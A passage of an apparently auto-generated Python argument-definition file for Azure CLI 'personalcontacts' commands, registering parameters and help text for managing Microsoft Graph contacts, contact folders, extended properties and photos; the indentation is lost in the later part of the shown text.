        c.argument('company_name', type=str, help='The name of the contact\'s company.')
        c.argument('department', type=str, help='The contact\'s department.')
        c.argument('display_name', type=str, help='The contact\'s display name. You can specify the display name in a '
                   'create or update operation. Note that later updates to other properties may cause an automatically '
                   'generated value to overwrite the displayName value you have specified. To preserve a pre-existing '
                   'value, always include it as displayName in an update operation.')
        c.argument('email_addresses', action=AddEmailAddresses, nargs='+', help='The contact\'s email addresses.')
        c.argument('file_as', type=str, help='The name the contact is filed under.')
        c.argument('generation', type=str, help='The contact\'s generation.')
        c.argument('given_name', type=str, help='The contact\'s given name.')
        c.argument('home_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
        c.argument('home_phones', nargs='+', help='The contact\'s home phone numbers.')
        c.argument('im_addresses', nargs='+', help='The contact\'s instant messaging (IM) addresses.')
        c.argument('initials', type=str, help='The contact\'s initials.')
        c.argument('job_title', type=str, help='The contact’s job title.')
        c.argument('manager', type=str, help='The name of the contact\'s manager.')
        c.argument('middle_name', type=str, help='The contact\'s middle name.')
        c.argument('mobile_phone', type=str, help='The contact\'s mobile phone number.')
        c.argument('nick_name', type=str, help='The contact\'s nickname.')
        c.argument('office_location', type=str, help='The location of the contact\'s office.')
        c.argument('other_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
        c.argument('parent_folder_id', type=str, help='The ID of the contact\'s parent folder.')
        c.argument('personal_notes', type=str, help='The user\'s notes about the contact.')
        c.argument('profession', type=str, help='The contact\'s profession.')
        c.argument('spouse_name', type=str, help='The name of the contact\'s spouse/partner.')
        c.argument('surname', type=str, help='The contact\'s surname.')
        c.argument('title', type=str, help='The contact\'s title.')
        c.argument('yomi_company_name', type=str, help='The phonetic Japanese company name of the contact.')
        c.argument('yomi_given_name', type=str, help='The phonetic Japanese given name (first name) of the contact.')
        c.argument('yomi_surname', type=str, help='The phonetic Japanese surname (last name) of the contact.')
        c.argument('extensions', action=AddExtensions, nargs='+', help='The collection of open extensions defined for '
                   'the contact. Read-only. Nullable.')
        c.argument('multi_value_extended_properties',
                   action=AddPersonalcontactsUserCreateContactMultiValueExtendedProperties, nargs='+', help='The '
                   'collection of multi-value extended properties defined for the contact. Read-only. Nullable.')
        c.argument('photo', action=AddPhoto, nargs='+', help='profilePhoto')
        c.argument('single_value_extended_properties',
                   action=AddPersonalcontactsUserCreateContactSingleValueExtendedProperties, nargs='+', help='The '
                   'collection of single-value extended properties defined for the contact. Read-only. Nullable.')
    with self.argument_context('personalcontacts user update-contact-folder') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
        c.argument('display_name', type=str, help='The folder\'s display name.')
        c.argument('parent_folder_id', type=str, help='The ID of the folder\'s parent folder.')
        c.argument('child_folders', type=validate_file_or_dict, help='The collection of child folders in the folder. '
                   'Navigation property. Read-only. Nullable. Expected value: json-string/@json-file.')
        c.argument('contacts', type=validate_file_or_dict, help='The contacts in the folder. Navigation property. '
                   'Read-only. Nullable. Expected value: json-string/@json-file.')
        c.argument('multi_value_extended_properties',
                   action=AddPersonalcontactsUserCreateContactFolderMultiValueExtendedProperties, nargs='+', help='The '
                   'collection of multi-value extended properties defined for the contactFolder. Read-only. Nullable.')
        c.argument('single_value_extended_properties',
                   action=AddPersonalcontactsUserCreateContactFolderSingleValueExtendedProperties, nargs='+',
                   help='The collection of single-value extended properties defined for the contactFolder. Read-only. '
                   'Nullable.')
    with self.argument_context('personalcontacts user-contact-folder create-child-folder') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
        c.argument('display_name', type=str, help='The folder\'s display name.')
        c.argument('parent_folder_id', type=str, help='The ID of the folder\'s parent folder.')
        c.argument('child_folders', type=validate_file_or_dict, help='The collection of child folders in the folder. '
                   'Navigation property. Read-only. Nullable. Expected value: json-string/@json-file.')
        c.argument('contacts', type=validate_file_or_dict, help='The contacts in the folder. Navigation property. '
                   'Read-only. Nullable. Expected value: json-string/@json-file.')
        c.argument('multi_value_extended_properties',
                   action=AddPersonalcontactsUserCreateContactFolderMultiValueExtendedProperties, nargs='+', help='The '
                   'collection of multi-value extended properties defined for the contactFolder. Read-only. Nullable.')
        c.argument('single_value_extended_properties',
                   action=AddPersonalcontactsUserCreateContactFolderSingleValueExtendedProperties, nargs='+',
                   help='The collection of single-value extended properties defined for the contactFolder. Read-only. '
                   'Nullable.')
    with self.argument_context('personalcontacts user-contact-folder create-contact') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
        c.argument('categories', nargs='+', help='The categories associated with the item')
        c.argument('change_key', type=str, help='Identifies the version of the item. Every time the item is changed, '
                   'changeKey changes as well. This allows Exchange to apply changes to the correct version of the '
                   'object. Read-only.')
        c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
                   'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
                   '\'2014-01-01T00:00:00Z\'')
        c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
                   '8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
                   'this: \'2014-01-01T00:00:00Z\'')
        c.argument('assistant_name', type=str, help='The name of the contact\'s assistant.')
        c.argument('birthday', help='The contact\'s birthday. The Timestamp type represents date and time information '
                   'using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would '
                   'look like this: \'2014-01-01T00:00:00Z\'')
        c.argument('business_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
        c.argument('business_home_page', type=str, help='The business home page of the contact.')
        c.argument('business_phones', nargs='+', help='The contact\'s business phone numbers.')
        c.argument('children', nargs='+', help='The names of the contact\'s children.')
        c.argument('company_name', type=str, help='The name of the contact\'s company.')
        c.argument('department', type=str, help='The contact\'s department.')
        c.argument('display_name', type=str, help='The contact\'s display name. You can specify the display name in a '
                   'create or update operation. Note that later updates to other properties may cause an automatically '
                   'generated value to overwrite the displayName value you have specified. To preserve a pre-existing '
                   'value, always include it as displayName in an update operation.')
        c.argument('email_addresses', action=AddEmailAddresses, nargs='+', help='The contact\'s email addresses.')
        c.argument('file_as', type=str, help='The name the contact is filed under.')
        c.argument('generation', type=str, help='The contact\'s generation.')
        c.argument('given_name', type=str, help='The contact\'s given name.')
        c.argument('home_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
        c.argument('home_phones', nargs='+', help='The contact\'s home phone numbers.')
        c.argument('im_addresses', nargs='+', help='The contact\'s instant messaging (IM) addresses.')
        c.argument('initials', type=str, help='The contact\'s initials.')
        c.argument('job_title', type=str, help='The contact’s job title.')
        c.argument('manager', type=str, help='The name of the contact\'s manager.')
        c.argument('middle_name', type=str, help='The contact\'s middle name.')
        c.argument('mobile_phone', type=str, help='The contact\'s mobile phone number.')
        c.argument('nick_name', type=str, help='The contact\'s nickname.')
        c.argument('office_location', type=str, help='The location of the contact\'s office.')
        c.argument('other_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
        c.argument('parent_folder_id', type=str, help='The ID of the contact\'s parent folder.')
        c.argument('personal_notes', type=str, help='The user\'s notes about the contact.')
        c.argument('profession', type=str, help='The contact\'s profession.')
        c.argument('spouse_name', type=str, help='The name of the contact\'s spouse/partner.')
        c.argument('surname', type=str, help='The contact\'s surname.')
        c.argument('title', type=str, help='The contact\'s title.')
        c.argument('yomi_company_name', type=str, help='The phonetic Japanese company name of the contact.')
        c.argument('yomi_given_name', type=str, help='The phonetic Japanese given name (first name) of the contact.')
        c.argument('yomi_surname', type=str, help='The phonetic Japanese surname (last name) of the contact.')
        c.argument('extensions', action=AddExtensions, nargs='+', help='The collection of open extensions defined for '
                   'the contact. Read-only. Nullable.')
        c.argument('multi_value_extended_properties',
                   action=AddPersonalcontactsUserCreateContactMultiValueExtendedProperties, nargs='+', help='The '
                   'collection of multi-value extended properties defined for the contact. Read-only. Nullable.')
        c.argument('photo', action=AddPhoto, nargs='+', help='profilePhoto')
        c.argument('single_value_extended_properties',
                   action=AddPersonalcontactsUserCreateContactSingleValueExtendedProperties, nargs='+', help='The '
                   'collection of single-value extended properties defined for the contact. Read-only. Nullable.')
    with self.argument_context('personalcontacts user-contact-folder create-multi-value-extended-property') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
        c.argument('value', nargs='+', help='A collection of property values.')
    with self.argument_context('personalcontacts user-contact-folder create-single-value-extended-property') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
        c.argument('value', type=str, help='A property value.')
    with self.argument_context('personalcontacts user-contact-folder delete-child-folder') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('contact_folder_id1', type=str, help='key: id of contactFolder')
        c.argument('if_match', type=str, help='ETag')
    with self.argument_context('personalcontacts user-contact-folder delete-contact') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('contact_id', type=str, help='key: id of contact')
        c.argument('if_match', type=str, help='ETag')
    with self.argument_context('personalcontacts user-contact-folder delete-multi-value-extended-property') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
                   'multiValueLegacyExtendedProperty')
        c.argument('if_match', type=str, help='ETag')
    with self.argument_context('personalcontacts user-contact-folder delete-single-value-extended-property') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
                   'singleValueLegacyExtendedProperty')
        c.argument('if_match', type=str, help='ETag')
    with self.argument_context('personalcontacts user-contact-folder list-child-folder') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('orderby', nargs='+', help='Order items by property values')
        c.argument('select', nargs='+', help='Select properties to be returned')
        c.argument('expand', nargs='+', help='Expand related entities')
    with self.argument_context('personalcontacts user-contact-folder list-contact') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('orderby', nargs='+', help='Order items by property values')
        c.argument('select', nargs='+', help='Select properties to be returned')
        c.argument('expand', nargs='+', help='Expand related entities')
    with self.argument_context('personalcontacts user-contact-folder list-multi-value-extended-property') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('orderby', nargs='+', help='Order items by property values')
        c.argument('select', nargs='+', help='Select properties to be returned')
        c.argument('expand', nargs='+', help='Expand related entities')
    with self.argument_context('personalcontacts user-contact-folder list-single-value-extended-property') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('orderby', nargs='+', help='Order items by property values')
        c.argument('select', nargs='+', help='Select properties to be returned')
        c.argument('expand', nargs='+', help='Expand related entities')
    with self.argument_context('personalcontacts user-contact-folder show-child-folder') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('contact_folder_id1', type=str, help='key: id of contactFolder')
        c.argument('select', nargs='+', help='Select properties to be returned')
        c.argument('expand', nargs='+', help='Expand related entities')
    with self.argument_context('personalcontacts user-contact-folder show-contact') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('contact_id', type=str, help='key: id of contact')
        c.argument('select', nargs='+', help='Select properties to be returned')
        c.argument('expand', nargs='+', help='Expand related entities')
    with self.argument_context('personalcontacts user-contact-folder show-multi-value-extended-property') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
                   'multiValueLegacyExtendedProperty')
        c.argument('select', nargs='+', help='Select properties to be returned')
        c.argument('expand', nargs='+', help='Expand related entities')
    with self.argument_context('personalcontacts user-contact-folder show-single-value-extended-property') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
                   'singleValueLegacyExtendedProperty')
        c.argument('select', nargs='+', help='Select properties to be returned')
        c.argument('expand', nargs='+', help='Expand related entities')
    with self.argument_context('personalcontacts user-contact-folder update-child-folder') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('contact_folder_id1', type=str, help='key: id of contactFolder')
        c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
        c.argument('display_name', type=str, help='The folder\'s display name.')
        c.argument('parent_folder_id', type=str, help='The ID of the folder\'s parent folder.')
        c.argument('child_folders', type=validate_file_or_dict, help='The collection of child folders in the folder. '
                   'Navigation property. Read-only. Nullable. Expected value: json-string/@json-file.')
        c.argument('contacts', type=validate_file_or_dict, help='The contacts in the folder. Navigation property. '
                   'Read-only. Nullable. Expected value: json-string/@json-file.')
        c.argument('multi_value_extended_properties',
                   action=AddPersonalcontactsUserCreateContactFolderMultiValueExtendedProperties, nargs='+', help='The '
                   'collection of multi-value extended properties defined for the contactFolder. Read-only. Nullable.')
        c.argument('single_value_extended_properties',
                   action=AddPersonalcontactsUserCreateContactFolderSingleValueExtendedProperties, nargs='+',
                   help='The collection of single-value extended properties defined for the contactFolder. Read-only. '
                   'Nullable.')
with self.argument_context('personalcontacts user-contact-folder update-contact') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('categories', nargs='+', help='The categories associated with the item')
c.argument('change_key', type=str, help='Identifies the version of the item. Every time the item is changed, '
'changeKey changes as well. This allows Exchange to apply changes to the correct version of the '
'object. Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('assistant_name', type=str, help='The name of the contact\'s assistant.')
c.argument('birthday', help='The contact\'s birthday. The Timestamp type represents date and time information '
'using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would '
'look like this: \'2014-01-01T00:00:00Z\'')
c.argument('business_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
c.argument('business_home_page', type=str, help='The business home page of the contact.')
c.argument('business_phones', nargs='+', help='The contact\'s business phone numbers.')
c.argument('children', nargs='+', help='The names of the contact\'s children.')
c.argument('company_name', type=str, help='The name of the contact\'s company.')
c.argument('department', type=str, help='The contact\'s department.')
c.argument('display_name', type=str, help='The contact\'s display name. You can specify the display name in a '
'create or update operation. Note that later updates to other properties may cause an automatically '
'generated value to overwrite the displayName value you have specified. To preserve a pre-existing '
'value, always include it as displayName in an update operation.')
c.argument('email_addresses', action=AddEmailAddresses, nargs='+', help='The contact\'s email addresses.')
c.argument('file_as', type=str, help='The name the contact is filed under.')
c.argument('generation', type=str, help='The contact\'s generation.')
c.argument('given_name', type=str, help='The contact\'s given name.')
c.argument('home_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
c.argument('home_phones', nargs='+', help='The contact\'s home phone numbers.')
c.argument('im_addresses', nargs='+', help='The contact\'s instant messaging (IM) addresses.')
c.argument('initials', type=str, help='The contact\'s initials.')
c.argument('job_title', type=str, help='The contact\'s job title.')
c.argument('manager', type=str, help='The name of the contact\'s manager.')
c.argument('middle_name', type=str, help='The contact\'s middle name.')
c.argument('mobile_phone', type=str, help='The contact\'s mobile phone number.')
c.argument('nick_name', type=str, help='The contact\'s nickname.')
c.argument('office_location', type=str, help='The location of the contact\'s office.')
c.argument('other_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
c.argument('parent_folder_id', type=str, help='The ID of the contact\'s parent folder.')
c.argument('personal_notes', type=str, help='The user\'s notes about the contact.')
c.argument('profession', type=str, help='The contact\'s profession.')
c.argument('spouse_name', type=str, help='The name of the contact\'s spouse/partner.')
c.argument('surname', type=str, help='The contact\'s surname.')
c.argument('title', type=str, help='The contact\'s title.')
c.argument('yomi_company_name', type=str, help='The phonetic Japanese company name of the contact.')
c.argument('yomi_given_name', type=str, help='The phonetic Japanese given name (first name) of the contact.')
c.argument('yomi_surname', type=str, help='The phonetic Japanese surname (last name) of the contact.')
c.argument('extensions', action=AddExtensions, nargs='+', help='The collection of open extensions defined for '
'the contact. Read-only. Nullable.')
c.argument('multi_value_extended_properties',
action=AddPersonalcontactsUserCreateContactMultiValueExtendedProperties, nargs='+', help='The '
'collection of multi-value extended properties defined for the contact. Read-only. Nullable.')
c.argument('photo', action=AddPhoto, nargs='+', help='profilePhoto')
c.argument('single_value_extended_properties',
action=AddPersonalcontactsUserCreateContactSingleValueExtendedProperties, nargs='+', help='The '
'collection of single-value extended properties defined for the contact. Read-only. Nullable.')
with self.argument_context('personalcontacts user-contact-folder update-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('personalcontacts user-contact-folder update-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('personalcontacts user-contact-folder-contact create-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('personalcontacts user-contact-folder-contact create-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('personalcontacts user-contact-folder-contact create-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('personalcontacts user-contact-folder-contact delete-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact-folder-contact delete-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact-folder-contact delete-photo') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact-folder-contact delete-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact-folder-contact list-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder-contact list-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder-contact list-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder-contact show-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder-contact show-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder-contact show-photo') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder-contact show-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder-contact update-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('personalcontacts user-contact-folder-contact update-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('personalcontacts user-contact-folder-contact update-photo') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('height', type=int, help='The height of the photo. Read-only.')
c.argument('width', type=int, help='The width of the photo. Read-only.')
with self.argument_context('personalcontacts user-contact-folder-contact update-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('personalcontacts user-contact create-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('personalcontacts user-contact create-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('personalcontacts user-contact create-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('personalcontacts user-contact delete-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact delete-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact delete-photo') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact delete-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact list-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact list-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact list-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact show-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact show-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact show-photo') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact show-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact update-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('personalcontacts user-contact update-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('personalcontacts user-contact update-photo') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('height', type=int, help='The height of the photo. Read-only.')
